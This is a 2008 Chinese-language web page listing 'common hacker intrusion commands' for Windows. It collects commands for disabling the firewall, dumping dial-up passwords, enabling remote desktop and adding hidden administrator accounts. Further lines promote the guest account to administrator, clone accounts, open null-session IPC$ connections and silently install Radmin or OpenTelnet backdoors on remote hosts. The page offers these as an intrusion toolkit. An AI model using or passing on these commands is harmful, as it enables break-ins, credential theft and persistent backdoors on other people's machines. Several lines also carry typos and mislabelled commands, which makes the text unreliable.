通过QQ查IP地址
什么是ARP欺骗及ARP02:24 Mar 21, 2008
edit by: admin
黑客常用入侵命令
控制面版:运行>>>>>>>>>>>:control
计算机管理:command MMC
结束XP防火墙进程:net stop sharedaccess
查看ADSL帐号密码的代码:dialupass /allusers /stext "c:\pass.txt
启动3389服务:net start TermService
关闭所有防火墙的代码:cmd.exe /c net stop sharedaccess
iis命令重启:iisreset /reboot
用CMD命令实现路由跟踪:tracert 域名(如:www.google.com)
结束进程:NET SHARE
查看版本:ver
查看中端(服务):net start
查看文件:dir
查看3389:
加用户:c:\winnt\system32>net user adminserver$ admin /add
提权限:net localgroup administrators adminserver$ /add
211.38.172.2 2180
查看用户net user
远程连接到主机CMD命令:telnet 主机IP
踢人:logoff ID
查看当前人:query user
打开telnet:net start telnet
telnet连接工具:OpenTelnet
删除共享: net share c$=c:\
删除共享: net share c$ /del
启用GUEST:net user guest /active:yes
为GUEST设密码:net user guest 888888
提升到管理员:net localgroup "Administrators" guest /add
超级用户隐藏器:c:\door adminserver$:admin
克隆帐号:ca \\IP 你建立的帐号 密码 肉机默认帐号 密码
ca \\127.0.0.1 adminserver$ admin adminserver admin
完全禁止系统模认工享
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders\{59031a47-3f72-44a7-89c5-5595fe6b30ee}]
3389替换服务-----------------------
中修改[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
c:\winnt\system32\copy termsrv.exe service.exe
c:\winnt\system32\cd..
c:\winnt\sc \\127.0.0.1 config Alerter binpath= c:\winnt\system32\service.exe
端口转向:f:\web\ftp.exe "c:\fpipe.exe -v -l 开放的端口 -r 要转向的端口 ip"
使用空口令连接:
net use \\对方IP\ipc$ "" /user:"administrator"
(在上传文件的目录下)远程复制文件:
c:\radmin>net use \\a-01\ipc$ "12345" /user:administrator
c:\ramdin>copy r_server.exe \\a-01\admin$\system32
c:\ramdin>copy radmin.reg \\a-01\admin$\sytem32
在对方CMD下:
c:\winnt\system32\>regedit /s radmin.reg
c:\winnt\system32\>r_server.exe /install /silenec
net start r_server
copy r_server.exe \\对方IP\admin$\system32
c:\opentelnet.exe \\IP ADMINISTRATOR "" 0 90
copy 文件名 \\IP\admin$\system32
进入对方CMD:
c:\opentelnet.exe \\Ip administrator "" 0 90
登陆CMD:
c:\telnet IP 90
安装RADMIN:
c:\winnt\system32\
r_server /install silence
c:\winnt\system32\
r-server
